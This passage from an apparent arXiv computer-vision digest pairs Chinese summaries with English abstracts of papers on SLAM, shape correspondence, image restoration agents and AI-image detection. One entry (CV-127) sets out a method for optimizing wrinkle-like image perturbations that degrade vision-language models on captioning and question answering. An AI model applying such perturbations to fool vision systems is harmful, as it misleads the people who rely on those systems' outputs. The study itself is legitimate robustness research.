Abstract:Accurate observation of dynamic environments traditionally relies on synthesizing raw, signal-level information from multiple distributed sensors. This work investigates an alternative approach: performing geospatial inference using only encrypted packet-level information, without access to the raw sensory data. We further explore how this indirect information can be fused with directly available sensory data to extend overall inference capabilities. We introduce GraySense, a learning-based framework that performs geospatial object tracking by analyzing encrypted wireless video transmission traffic, such as packet sizes, from cameras with inaccessible streams. GraySense leverages the inherent relationship between scene dynamics and transmitted packet sizes to infer object motion. The framework consists of two stages: (1) a Packet Grouping module that identifies frame boundaries and estimates frame sizes from encrypted network traffic, and (2) a Tracker module, based on a Transformer encoder with a recurrent state, which fuses indirect packet-based inputs with optional direct camera-based inputs to estimate the object’s position. Extensive experiments with realistic videos from the CARLA simulator and emulated networks under varying conditions show that GraySense achieves 2.33 meters tracking error (Euclidean distance) without raw signal access, within the dimensions of tracked objects (4.61m x 1.93m). To our knowledge, this capability has not been previously demonstrated, expanding the use of latent signals for sensing.
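摘要中 Packet Grouping 模块的核心想法,是利用加密视频流中报文的到达间隔来切分帧边界、累加报文大小得到帧大小估计。下面是一个按间隔阈值分组的极简示意(非论文官方实现),时间戳、报文大小与阈值取值均为假设:

```python
def group_packets_into_frames(timestamps, sizes, gap_threshold=0.01):
    """当相邻报文的到达间隔超过 gap_threshold(秒)时切分新帧,
    返回每帧的字节总数(帧大小估计)。"""
    frames = []
    current = 0
    for i, (t, s) in enumerate(zip(timestamps, sizes)):
        if i > 0 and t - timestamps[i - 1] > gap_threshold:
            frames.append(current)
            current = 0
        current += s
    if current:
        frames.append(current)
    return frames
```

得到的帧大小序列随后才会送入 Tracker 模块与可选的直接摄像头输入融合。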
[CV-121] Engineering Mythology: A Digital-Physical Framework for Culturally-Inspired Public Art
【速读】:该论文旨在解决跨学科、跨地域协作在大型公共艺术项目中面临的系统性挑战,特别是如何将文化传承(如印度奥里萨邦的神话叙事)、手工技艺与数字技术(如生成式设计、数字孪生和分布式制造)高效整合,并实现从设计到现场组装的一体化流程。其解决方案的关键在于构建一个融合数字-物理工作流(digital-physical workflow):通过数字建模与参数化优化确保结构可行性,利用本地工匠(Odisha artisans)进行分布式制造以保留文化特色,借助摄影测量与数字孪生实现迭代反馈与精度控制,并最终在黑岩沙漠一次性完成模块化装配,从而验证了多知识体系(包括工艺实践、结构工程、神话叙事与环境约束)协同运作的可行性,为未来STEAM教育、文化遗产保护与公共艺术的交叉项目提供了可复用的方法论框架。
链接: https://arxiv.org/abs/2603.27801
作者: Jnaneshwar Das,Christopher Filkins,Rajesh Moharana,Ekadashi Barik,Bishweshwar Das,David Ayers,Christopher Skiba,Rodney Staggers Jr,Mark Dill,Swig Miller,Daniel Tulberg,Patrick Smith,Seth Brink,Kyle Breen,Harish Anand,Ramon Arrowsmith
机构: Earth Innovation Hub (地球创新中心); Devi Art Foundation (德维艺术基金会); Arizona State University (亚利桑那州立大学)
类目: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV); Computers and Society (cs.CY); Robotics (cs.RO)
备注: 19 pages, 28 figures, 4 tables
Abstract:Navagunjara Reborn: The Phoenix of Odisha was built for Burning Man 2025 as both a sculpture and an experiment-a fusion of myth, craft, and computation. This paper describes the digital-physical workflow developed for the project: a pipeline that linked digital sculpting, distributed fabrication by artisans in Odisha (India), modular structural optimization in the U.S., iterative feedback through photogrammetry and digital twins, and finally, one-shot full assembly at the art site in Black Rock Desert, Nevada. The desert installation tested not just materials, but also systems of collaboration: between artisans and engineers, between myth and technology, between cultural specificity and global experimentation. We share the lessons learned in design, fabrication, and deployment and offer a framework for future interdisciplinary projects at the intersection of cultural heritage, STEAM education, and public art. In retrospect, this workflow can be read as a convergence of many knowledge systems-artisan practice, structural engineering, mythic narrative, and environmental constraint-rather than as execution of a single fixed blueprint.
[CV-122] Diversity Matters: Dataset Diversification and Dual-Branch Network for Generalized AI-Generated Image Detection
【速读】:该论文旨在解决AI生成图像(AI-generated images)检测在跨模型和跨数据集场景下的泛化能力不足问题,尤其针对生成对抗网络(GANs)、扩散模型等多样化的生成技术所导致的检测鲁棒性差这一挑战。解决方案的关键在于提出一个名为“Diversity Matters”的新框架,其核心创新包括:(1)引入特征域相似性过滤机制,通过剔除类别间与类别内高度冗余的样本,提升训练数据的多样性与代表性;(2)设计双分支网络结构,融合像素域与频域的CLIP特征,协同捕捉语义信息与结构特征,从而增强对未见生成模型及对抗条件下的检测性能。该方法显著提升了跨模型与跨数据集的检测效果,验证了数据多样性与特征域互补性对构建可靠检测器的重要性。
链接: https://arxiv.org/abs/2603.27800
作者: Nusrat Tasnim,Kutub Uddin,Khalid Malik
机构: Korea Aerospace University (韩国航空航天大学); University of Michigan-Flint (密歇根大学弗林特分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The rapid proliferation of AI-generated images, powered by generative adversarial networks (GANs), diffusion models, and other synthesis techniques, has raised serious concerns about misinformation, copyright violations, and digital security. However, detecting such images in a generalized and robust manner remains a major challenge due to the vast diversity of generative models and data distributions. In this work, we present \textbfDiversity Matters, a novel framework that emphasizes data diversity and feature domain complementarity for AI-generated image detection. The proposed method introduces a feature-domain similarity filtering mechanism that discards redundant or highly similar samples across both inter-class and intra-class distributions, ensuring a more diverse and representative training set. Furthermore, we propose a dual-branch network that combines CLIP features from the pixel domain and the frequency domain to jointly capture semantic and structural cues, leading to improved generalization against unseen generative models and adversarial conditions. Extensive experiments on benchmark datasets demonstrate that the proposed approach significantly improves cross-model and cross-dataset performance compared to existing methods. \textbfDiversity Matters highlights the critical role of data and feature diversity in building reliable and robust detectors against the rapidly evolving landscape of synthetic content.
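论文提出的特征域相似性过滤机制,本质上是在特征空间中剔除与已保留样本过于相似的冗余样本。下面用贪心的余弦相似度去重给出一个极简示意(非论文官方实现),阈值与特征均为假设:

```python
import numpy as np

def filter_redundant(features, threshold=0.95):
    """贪心保留与所有已保留样本的余弦相似度均低于 threshold 的样本,
    返回保留样本的下标列表(即多样化后的训练子集)。"""
    feats = features / np.linalg.norm(features, axis=1, keepdims=True)
    kept = []
    for i, f in enumerate(feats):
        if all(float(f @ feats[j]) < threshold for j in kept):
            kept.append(i)
    return kept
```

论文中该过滤同时作用于类间与类内分布,并且特征来自 CLIP 的像素域与频域双分支,此处仅示意单一特征空间的情形。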
[CV-123] Inference-time Trajectory Optimization for Manga Image Editing
【速读】:该论文旨在解决预训练图像编辑模型在漫画(manga)图像上表现不佳的问题,这是因为现有模型主要基于自然图像数据训练,而直接对大规模模型进行再训练或微调以适配漫画数据在计算成本和版权方面均不可行。其解决方案的关键在于提出一种推理时自适应方法(inference-time adaptation),仅利用输入的漫画图像本身,在推理阶段微调生成轨迹,使模型在空提示(empty prompt)下能更忠实重建输入图像,从而实现无需额外标注或训练即可提升对漫画图像的编辑效果,且计算开销极低。
链接: https://arxiv.org/abs/2603.27790
作者: Ryosuke Furuta
机构: Mantra Inc.(Mantra公司); The University of Tokyo(东京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present an inference-time adaptation method that tailors a pretrained image editing model to each input manga image using only the input image itself. Despite recent progress in pretrained image editing, such models often underperform on manga because they are trained predominantly on natural-image data. Re-training or fine-tuning large-scale models on manga is, however, generally impractical due to both computational cost and copyright constraints. To address this issue, our method slightly corrects the generation trajectory at inference time so that the input image can be reconstructed more faithfully under an empty prompt. Experimental results show that our method consistently outperforms existing baselines while incurring only negligible computational overhead.
[CV-124] GS3LAM: Gaussian Semantic Splatting SLAM ACM-MM2024
【速读】:该论文旨在解决现有语义SLAM(Semantic SLAM)系统在构建一致、稠密且实时的语义地图时面临的挑战,尤其是显式表示方法受限于分辨率和未知区域预测能力不足,而隐式表示方法则因依赖耗时的射线追踪难以满足实时性要求。其解决方案的关键在于提出GS3LAM框架,该框架将场景建模为语义高斯场(Semantic Gaussian Field, SG-Field),通过多模态误差约束联合优化相机位姿与场结构,并引入深度自适应尺度正则化(Depth-adaptive Scale Regularization, DSR)以校正尺度不变高斯与几何表面间的错位问题;同时采用基于随机采样的关键帧映射策略(Random Sampling-based Keyframe Mapping, RSKM)有效缓解灾难性遗忘,从而实现高效、鲁棒且高质量的实时语义重建。
链接: https://arxiv.org/abs/2603.27781
作者: Linfei Li,Lin Zhang,Zhong Wang,Ying Shen
机构: Tongji University (同济大学); Shanghai Jiaotong University (上海交通大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ACM MM 2024
Abstract:Recently, the multi-modal fusion of RGB, depth, and semantics has shown great potential in dense Simultaneous Localization and Mapping (SLAM). However, a prerequisite for generating consistent semantic maps is the availability of dense, efficient, and scalable scene representations. Existing semantic SLAM systems based on explicit representations are often limited by resolution and an inability to predict unknown areas. Conversely, implicit representations typically rely on time-consuming ray tracing, failing to meet real-time requirements. Fortunately, 3D Gaussian Splatting (3DGS) has emerged as a promising representation that combines the efficiency of point-based methods with the continuity of geometric structures. To this end, we propose GS3LAM, a Gaussian Semantic Splatting SLAM framework that processes multimodal data to render consistent, dense semantic maps in real-time. GS3LAM models the scene as a Semantic Gaussian Field (SG-Field) and jointly optimizes camera poses and the field via multimodal error constraints. Furthermore, a Depth-adaptive Scale Regularization (DSR) scheme is introduced to resolve misalignments between scale-invariant Gaussians and geometric surfaces. To mitigate catastrophic forgetting, we propose a Random Sampling-based Keyframe Mapping (RSKM) strategy, which demonstrates superior performance over common local covisibility optimization methods. Extensive experiments on benchmark datasets show that GS3LAM achieves increased tracking robustness, superior rendering quality, and enhanced semantic precision compared to state-of-the-art methods. Source code is available at this https URL.
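摘要中基于随机采样的关键帧映射(RSKM)用于缓解灾难性遗忘:每次映射迭代时,除当前关键帧外再从历史关键帧中均匀采样若干帧参与优化,使旧区域持续获得梯度信号。下面是一个极简示意(非论文官方实现),函数名与采样数量均为假设:

```python
import random

def sample_keyframes(history, current, n=5, seed=None):
    """当前关键帧 + 从历史关键帧中均匀无放回采样 n 个,
    构成本次映射迭代使用的关键帧集合。"""
    rng = random.Random(seed)
    past = [k for k in history if k != current]
    picked = rng.sample(past, min(n, len(past)))
    return [current] + picked
```

与仅优化局部共视关键帧相比,这种全局均匀采样让高斯场在旧视角下也不断被重新约束,这正是论文报告其优于局部共视优化的原因。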
[CV-125] Exploring Student Perception on Gen AI Adoption in Higher Education: A Descriptive Study
【速读】:该论文旨在解决高等教育中生成式人工智能(Generative Artificial Intelligence, GenAI)应用过程中学生视角的缺失问题,即当前关于GenAI在教学与评估中的整合研究多聚焦于机构和教师立场,而对学生如何感知、使用及评价GenAI在学术实践中的作用缺乏系统探讨。其解决方案的关键在于提出一种以教学法为导向的框架:强调将AI素养(AI literacy)纳入课程体系,提供伦理指导,并确保学生对AI工具的公平获取,从而推动高校从单纯监管转向赋能式管理,促进GenAI在学术场景中的负责任且有效的应用。
链接: https://arxiv.org/abs/2603.27777
作者: Harpreet Singh,Jaspreet Singh,Satwant Singh,Rupinder Singh,Shamim Ibne Shahid,Mohammad Hassan,Tayarani Najaran
机构: 未知
类目: Computers and Society (cs.CY); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The rapid proliferation of Generative Artificial Intelligence (GenAI) is reshaping pedagogical practices and assessment models in higher education. While institutional and educator perspectives on GenAI integration are increasingly documented, the student perspective remains comparatively underexplored. This study examines how students perceive, use, and evaluate GenAI within their academic practices, focusing on usage patterns, perceived benefits, and expectations for institutional support. Data were collected through a questionnaire administered to 436 postgraduate Computer Science students at the University of Hertfordshire and analysed using descriptive methods. The findings reveal a Confidence-Competence Paradox: although more than 60% of students report high familiarity with tools such as ChatGPT, daily academic use remains limited and confidence in effective application is only moderate. Students primarily employ GenAI for cognitive scaffolding tasks, including concept clarification and brainstorming, rather than fully automated content generation. At the same time, respondents express concerns regarding data privacy, reliability of AI-generated information, and the potential erosion of critical thinking skills. The results also indicate strong student support for integrating AI literacy into curricula and programme Knowledge, Skills, and Behaviours (KSBs). Overall, the study suggests that universities should move beyond a policing approach to GenAI and adopt a pedagogical framework that emphasises AI literacy, ethical guidance, and equitable access to AI tools.
[CV-126] RINO: Rotation-Invariant Non-Rigid Correspondences CVPR
【速读】:该论文旨在解决密集三维形状对应(Dense 3D Shape Correspondence)问题,尤其是在非等距形变(non-isometric deformations)、部分数据(partial data)和非流形输入(non-manifold inputs)等复杂场景下,现有深度学习方法因依赖中间几何特征或手工设计描述符而导致性能受限的问题。解决方案的关键在于提出一种无监督、旋转不变的密集对应框架 RINO,其核心是 RINONet——一种结合向量基 SO(3)-不变学习与方向感知复函数映射(orientation-aware complex functional maps)的特征提取器,能够直接从原始几何数据中学习鲁棒特征,从而实现无需形状预对齐或手工特征的端到端数据驱动匹配。
链接: https://arxiv.org/abs/2603.27773
作者: Maolin Gao,Shao Jie Hu-Chen,Congyue Deng,Riccardo Marin,Leonidas Guibas,Daniel Cremers
机构: TUM; Stanford University; MCML; MIT
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 17 pages, 36 Figures, Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Dense 3D shape correspondence remains a central challenge in computer vision and graphics as many deep learning approaches still rely on intermediate geometric features or handcrafted descriptors, limiting their effectiveness under non-isometric deformations, partial data, and non-manifold inputs. To overcome these issues, we introduce RINO, an unsupervised, rotation-invariant dense correspondence framework that effectively unifies rigid and non-rigid shape matching. The core of our method is the novel RINONet, a feature extractor that integrates vector-based SO(3)-invariant learning with orientation-aware complex functional maps to extract robust features directly from raw geometry. This allows for a fully end-to-end, data-driven approach that bypasses the need for shape pre-alignment or handcrafted features. Extensive experiments show unprecedented performance of RINO across challenging non-rigid matching tasks, including arbitrary poses, non-isometry, partiality, non-manifoldness, and noise.
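RINONet 所依赖的"向量基 SO(3) 不变"特征,其数学基础是:向量间的内积在任意共同旋转下保持不变(Rv_i · Rv_j = v_i · v_j)。下面用 Gram 矩阵给出一个最小化的数值验证(非论文官方实现):

```python
import numpy as np

def so3_invariant_features(vectors):
    """逐点向量特征的 Gram 矩阵: 内积对任意共同旋转 R 不变,
    因此可作为旋转不变描述子的构件。"""
    return vectors @ vectors.T
```

实际网络在此类不变量之上叠加可学习的非线性层,并结合方向感知的复函数映射完成匹配,这里仅展示不变性本身。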
[CV-127] When Surfaces Lie: Exploiting Wrinkle-Induced Attention Shift to Attack Vision-Language Models
【速读】:该论文旨在解决视觉-语言模型(Visual-Language Models, VLMs)在面对物理上合理但非刚性形变(如柔性表面褶皱)时的鲁棒性不足问题。现有研究多关注于图像分类等任务,而对真实世界中常见的非刚性变形导致的性能退化缺乏系统评估与应对策略。其解决方案的关键在于提出一种受三维织物褶皱力学启发的参数化结构扰动方法:通过构建多尺度褶皱场,并结合位移场畸变与表面一致性外观变化,生成逼真的非刚性扰动;同时设计低维参数空间中的分层适应度函数并采用优化搜索策略,在视觉自然性与对抗有效性之间取得平衡,从而显著降低多种先进VLMs在零样本分类、图像描述和视觉问答等任务上的性能表现,验证了该方法的有效性和迁移能力。
链接: https://arxiv.org/abs/2603.27759
作者: Chengyin Hu,Xuemeng Sun,Jiajun Han,Qike Zhang,Xiang Chen,Xin Wang,Yiwei Wei,Jiahua Long
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Visual-Language Models (VLMs) have demonstrated exceptional cross-modal understanding across various tasks, including zero-shot classification, image captioning, and visual question answering. However, their robustness to physically plausible non-rigid deformations-such as wrinkles on flexible surfaces-remains poorly understood. In this work, we propose a parametric structural perturbation method inspired by the mechanics of three-dimensional fabric wrinkles. Specifically, our method generates photorealistic non-rigid perturbations by constructing multi-scale wrinkle fields and integrating displacement field distortion with surface-consistent appearance variations. To achieve an optimal balance between visual naturalness and adversarial effectiveness, we design a hierarchical fitness function in a low-dimensional parameter space and employ an optimization-based search strategy. We evaluate our approach using a two-stage framework: perturbations are first optimized on a zero-shot classification proxy task and subsequently assessed for transferability on generative tasks. Experimental results demonstrate that our method significantly degrades the performance of various state-of-the-art VLMs, consistently outperforming baselines in both image captioning and visual question-answering tasks.
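论文中的多尺度褶皱场可以理解为不同空间频率、随机相位的位移分量的叠加,粗尺度幅度大、细尺度幅度小。下面给出一个正弦叠加的极简示意(非论文官方实现),尺度、幅度与相位采样方式均为假设:

```python
import numpy as np

def wrinkle_field(h, w, scales=(4, 8, 16), amps=(1.0, 0.5, 0.25), seed=0):
    """多尺度随机相位正弦位移场: 每个尺度贡献一个二维正弦分量,
    叠加后作为非刚性褶皱扰动的位移图。"""
    rng = np.random.default_rng(seed)
    y, x = np.mgrid[0:h, 0:w].astype(float)
    field = np.zeros((h, w))
    for s, a in zip(scales, amps):
        px, py = rng.uniform(0, 2 * np.pi, size=2)
        field += a * np.sin(2 * np.pi * x / s + px) * np.sin(2 * np.pi * y / s + py)
    return field
```

论文在此类低维参数(尺度、幅度、相位)空间上用分层适应度函数做优化搜索,以兼顾视觉自然性与对抗有效性。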
[CV-128] RHO: Robust Holistic OSM-Based Metric Cross-View Geo-Localization CVPR2026
【速读】:该论文旨在解决跨视角地理定位(Cross-View Geo-Localization, CVGL)中因传感器噪声、天气变化和光照差异导致的定位精度下降问题,尤其针对传统基于针孔相机与卫星图像的方法在复杂环境下的鲁棒性不足。其解决方案的关键在于提出一个名为RHO的双分支Pin-Pan架构模型,并引入Split-Undistort-Merge(SUM)模块以校正全景图的畸变,以及Position-Orientation Fusion(POF)机制以融合位置与方向信息,从而提升在真实世界多变条件下的视觉定位准确性。同时,作者构建了大规模基准数据集CV-RHO,包含超过270万张不同气象和光照条件下带传感器噪声的全景图,为研究提供了高质量的数据支撑。
链接: https://arxiv.org/abs/2603.27758
作者: Junwei Zheng,Ruize Dai,Ruiping Liu,Zichao Zeng,Yufan Chen,Fangjinhua Wang,Kunyu Peng,Kailun Yang,Jiaming Zhang,Rainer Stiefelhagen
机构: Karlsruhe Institute of Technology (卡尔斯鲁厄理工学院); Hunan University (湖南大学); ETH Zurich (苏黎世联邦理工学院); UCL (伦敦大学学院); INSAIT (INSAIT)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026. Project page: this https URL
Abstract:Metric Cross-View Geo-Localization (MCVGL) aims to estimate the 3-DoF camera pose (position and heading) by matching ground and satellite images. In this work, instead of pinhole and satellite images, we study robust MCVGL using holistic panoramas and OpenStreetMap (OSM). To this end, we establish a large-scale MCVGL benchmark dataset, CV-RHO, with over 2.7M images under different weather and lighting conditions, as well as sensor noise. Furthermore, we propose a model termed RHO with a two-branch Pin-Pan architecture for accurate visual localization. A Split-Undistort-Merge (SUM) module is introduced to address the panoramic distortion, and a Position-Orientation Fusion (POF) mechanism is designed to enhance the localization accuracy. Extensive experiments prove the value of our CV-RHO dataset and the effectiveness of the RHO model, with a significant performance gain up to 20% compared with the state-of-the-art baselines. Project page: this https URL.
[CV-129] E-TIDE: Fast Structure-Preserving Motion Forecasting from Event Sequences
【速读】:该论文旨在解决基于事件的相机(event-based camera)在资源受限场景下进行未来事件表示预测的问题,该任务对下游应用如语义分割或目标跟踪至关重要。现有方法虽性能优异,但通常依赖计算复杂度高的骨干网络和大规模预训练,难以在低延迟、小内存的实时部署环境中使用。解决方案的关键在于提出一种轻量级端到端可训练架构 E-TIDE,其核心是 TIDE 模块(Temporal Interaction for Dynamic Events),通过大核混合(large-kernel mixing)与活动感知门控(activity-aware gating)机制,在保持低计算复杂度的同时高效建模稀疏事件张量的时空动态关系,从而实现高精度预测且显著降低模型规模与训练需求。
链接: https://arxiv.org/abs/2603.27757
作者: Biswadeep Sen,Benoit R. Cottereau,Nicolas Cuperlier,Terence Sim
机构: National University of Singapore (新加坡国立大学); IPAL CNRS IRL 2955 (IPAL CNRS IRL 2955); CerCo, CNRS UMR 5549, Université de Toulouse (CerCo, CNRS UMR 5549, 图卢兹大学); ETIS UMR8051, CY Cergy Paris Université, ENSEA, CNRS (ETIS UMR8051, CY Cergy巴黎大学, ENSEA, CNRS)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Event-based cameras capture visual information as asynchronous streams of per-pixel brightness changes, generating sparse, temporally precise data. Compared to conventional frame-based sensors, they offer significant advantages in capturing high-speed dynamics while consuming substantially less power. Predicting future event representations from past observations is an important problem, enabling downstream tasks such as future semantic segmentation or object tracking without requiring access to future sensor measurements. While recent state-of-the-art approaches achieve strong performance, they often rely on computationally heavy backbones and, in some cases, large-scale pretraining, limiting their applicability in resource-constrained scenarios. In this work, we introduce E-TIDE, a lightweight, end-to-end trainable architecture for event-tensor prediction that is designed to operate efficiently without large-scale pretraining. Our approach employs the TIDE module (Temporal Interaction for Dynamic Events), motivated by efficient spatiotemporal interaction design for sparse event tensors, to capture temporal dependencies via large-kernel mixing and activity-aware gating while maintaining low computational complexity. Experiments on standard event-based datasets demonstrate that our method achieves competitive performance with significantly reduced model size and training requirements, making it well-suited for real-time deployment under tight latency and memory budgets.
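TIDE 模块的"大核混合 + 活动感知门控"可以粗略理解为:先对事件张量沿时间维做大核(此处用滑动平均代替)混合,再用逐像素事件活动度经 sigmoid 得到的门控去调制混合结果。下面是一个 numpy 极简示意(非论文官方实现),核大小与门控形式均为假设:

```python
import numpy as np

def activity_gated_mixing(events, kernel_size=7):
    """events: (T, H, W) 事件张量。
    沿时间维做大核滑动平均(大核混合的简化), 再乘以
    由逐像素活动度驱动的 sigmoid 门控(活动感知门控的简化)。"""
    k = np.ones(kernel_size) / kernel_size
    mixed = np.apply_along_axis(lambda v: np.convolve(v, k, mode="same"), 0, events)
    activity = np.abs(events).mean(axis=0, keepdims=True)
    gate = 1.0 / (1.0 + np.exp(-activity))
    return gate * mixed
```

门控使低活动(稀疏)区域的响应被抑制,这与事件数据的稀疏性先验相符。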
[CV-130] AI-Powered Facial Mask Removal Is Not Suitable For Biometric Identification
【速读】:该论文旨在解决生成式 AI(Generative AI)在 crowd-sourced online criminal investigations 中用于面部去遮挡(facial unmasking)时所引发的可靠性与风险问题,特别是评估经 AI 处理后的图像是否能被可靠地匹配到真实身份。其解决方案的关键在于开展一项大规模实证分析,系统性地评估商业级 AI 面部去遮挡工具在真实场景下的识别准确率与潜在误判风险,从而为执法机构和公众提供关于此类技术应用边界与伦理规范的科学依据。
链接: https://arxiv.org/abs/2603.27747
作者: Emily A Cooper,Hany Farid
机构: University of California, Berkeley (加州大学伯克利分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Recently, crowd-sourced online criminal investigations have used generative-AI to enhance low-quality visual evidence. In one high-profile case, social-media users circulated an “AI-unmasked” image of a federal agent involved in a fatal shooting, fueling a wide-spread misidentification. In response to this and similar incidents, we conducted a large-scale analysis evaluating the efficacy and risks of commercial AI-powered facial unmasking, specifically assessing whether the resulting faces can be reliably matched to true identities.
[CV-131] Data Organization Matters in Multimodal Instruction Tuning: A Controlled Study of Capability Trade-offs
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在指令微调过程中,由于训练数据来自异构监督源且任务结构差异显著,其时间组织方式对模型在通用视觉理解、结构化推理与细粒度OCR/文档理解之间权衡的影响尚不明确的问题。解决方案的关键在于采用一个受控的三阶段训练框架,在保持模型架构、可训练模块及优化流程一致的前提下,仅改变后对齐阶段监督数据的时间排列顺序,系统比较四种数据调度策略:直接混合、课程学习(curriculum training)、平衡采样和逆向课程学习(reverse curriculum)。实验表明,课程学习在整体性能与结构化推理能力上表现最优,且训练动态分析揭示了先建立通用理解与推理能力再引入OCR密集型任务有助于优化过程更平稳、收敛更快,从而确立数据调度为多模态模型适配中的关键设计维度。
链接: https://arxiv.org/abs/2603.27744
作者: Guowei Tang
机构: East China Normal University (华东师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages, 2 figures
Abstract:Recent multimodal large language models (MLLMs) perform strongly on general visual understanding, diagram and chart reasoning, and document-centric perception. However, these abilities are learned from heterogeneous supervision sources with very different task structures and learning demands, and the effect of their temporal organization during training remains underexplored. We study whether data organization affects the trade-off among general understanding, structured reasoning, and fine-grained OCR/document understanding in multimodal instruction tuning. To isolate this factor, we use a controlled three-stage training framework in which the backbone, trainable modules, and optimization pipeline are fixed across all runs, and only the temporal arrangement of post-alignment supervision is changed. We compare four strategies: direct mixture, curriculum training, balanced sampling, and reverse curriculum. Experiments on general visual instruction following, diagram reasoning, chart reasoning, scene-text question answering, and document question answering show that data organization is a first-order design variable in multimodal adaptation. Curriculum training gives the best overall trade-off and the strongest structured reasoning performance. Balanced sampling is better for OCR-oriented capability but weakens the broader capability balance. Reverse curriculum performs worst in both final performance and optimization stability. Training-dynamics analysis further suggests that building general understanding and reasoning before introducing OCR-intensive supervision leads to smoother optimization and faster convergence. These findings highlight data scheduling as an explicit design dimension for multimodal model adaptation.
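论文比较的四种数据调度策略中,表现最好的课程学习(curriculum)可以用一个分阶段调度器来示意:把训练步均分为若干阶段,先通用理解、再结构化推理、最后 OCR 密集型监督。下面是一个极简示意(非论文官方实现),数据源名称与等分方式均为假设:

```python
def curriculum_stage(step, total_steps, sources=("general", "reasoning", "ocr")):
    """把 total_steps 均分为 len(sources) 个阶段,
    返回第 step 步应采样的监督源(最简单的课程调度)。"""
    stage = min(step * len(sources) // total_steps, len(sources) - 1)
    return sources[stage]
```

逆向课程即把 sources 反序;直接混合与平衡采样则不区分阶段,而是按固定比例混合采样。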
[CV-132] TIR-Agent: Training an Explorative and Efficient Agent for Image Restoration
【速读】:该论文旨在解决现有视觉-语言图像修复(Image Restoration, IR)代理在无训练情况下依赖启发式任务调度和穷举工具遍历所导致的次优修复路径与高昂计算成本问题。其核心瓶颈在于缺乏一个可学习的决策策略,使得模型难以高效处理退化感知的任务排序与工具组合。解决方案的关键在于提出TIR-Agent,一个可通过两阶段训练(监督微调+SFT后强化学习RL)获得直接工具调用策略的可训练图像修复代理;其中,两个关键设计保障了有效RL训练:一是对SFT数据施加随机扰动以扩展策略在任务调度与工具组合上的探索空间,二是采用多维自适应奖励机制动态调整异构图像质量指标权重,从而缓解奖励黑客(reward hacking)问题。此外,为支持高吞吐量异步GPU工具调用,还构建了全局共享的模型调用池,显著提升了推理效率(超过2.5倍加速)。
链接: https://arxiv.org/abs/2603.27742
作者: Yisheng Zhang,Guoli Jia,Haote Hu,Shanxu Zhao,Kaikai Zhao,Long Sun,Xinwei Long,Kai Tian,Che Jiang,Zhaoxiang Liu,Kai Wang,Shiguo Lian,Kaiyan Zhang,Bowen Zhou
机构: Tsinghua University (清华大学); China Unicom (中国联通); Hunan University (湖南大学); Frontis.AI; Shanghai Artificial Intelligence Laboratory (上海人工智能实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language agents that orchestrate specialized tools for image restoration (IR) have emerged as a promising method, yet most existing frameworks operate in a training-free manner. They rely on heuristic task scheduling and exhaustive tool traversal, resulting in sub-optimal restoration paths and prohibitive computational cost. We argue that the core bottleneck lies in the absence of a learned policy to make decision, as a vision-language model cannot efficiently handle degradation-aware task ordering and tool composition. To this end, we propose TIR-Agent, a trainable image restoration agent that performs a direct tool-calling policy through a two-stage training pipeline of supervised fine-tuning (SFT) followed by reinforcement learning (RL). Two key designs underpin effective RL training: (i) a random perturbation strategy applied to the SFT data, which broadens the policy’s exploration over task schedules and tool compositions, and (ii) a multi-dimensional adaptive reward mechanism that dynamically re-weights heterogeneous image quality metrics to mitigate reward hacking. To support high-throughput, asynchronous GPU-based tool invocation during training, we further develop a globally shared model-call pool. Experiments on both in-domain and out-of-domain degradations show that TIR-Agent outperforms 12 baselines, including 6 all-in-one models, 3 training-free agents, and 3 proprietary models, and achieves over 2.5 \times inference speedup by eliminating redundant tool executions.
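论文用于缓解奖励黑客的多维自适应奖励,其思路是对异构图像质量指标动态重加权,避免策略只优化单一"容易刷分"的指标。下面用"按运行均值反比加权"给出一个极简示意(非论文官方的加权公式,权重形式为假设):

```python
def adaptive_reward(metrics, running_means, eps=1e-6):
    """对每个质量指标按其运行均值的倒数加权并归一化,
    运行均值越高(越容易刷分)的指标权重越低。"""
    weights = {k: 1.0 / (running_means[k] + eps) for k in metrics}
    total = sum(weights.values())
    return sum(weights[k] / total * metrics[k] for k in metrics)
```

例如某指标的运行均值远高于其他指标时,它在总奖励中的占比会被自动压低,从而削弱单指标投机的收益。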
[CV-133] Synergizing Discriminative Exemplars and Self-Refined Experience for MLLM -based In-Context Learning in Medical Diagnosis
【速读】:该论文旨在解决通用多模态大语言模型(Multimodal Large Language Models, MLLMs)在医学诊断中因缺乏领域特异性理解而导致性能不足的问题,同时避免传统微调方法所面临的专家标注成本高和计算开销大的局限。其解决方案的关键在于提出一种无需更新预训练模型权重的临床医生仿生工作流(Clinician Mimetic Workflow),该框架通过判别性示例核心集选择(Discriminative Exemplar Coreset Selection, DECS)模拟临床医生对“锚定病例”的参考能力,从噪声数据中选取判别性强的视觉核心子集;并结合自精炼经验总结机制(Self-Refined Experience Summarization, SRES),将多样化的推理路径动态归纳为文本形式的经验库(Experience Bank),从而实现高效且精准的参数无关型医疗领域内上下文学习(In-Context Learning, ICL)。
链接: https://arxiv.org/abs/2603.27737
作者: Wenkai Zhao,Zipei Wang,Mengjie Fang,Di Dong,Jie Tian,Lingwei Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
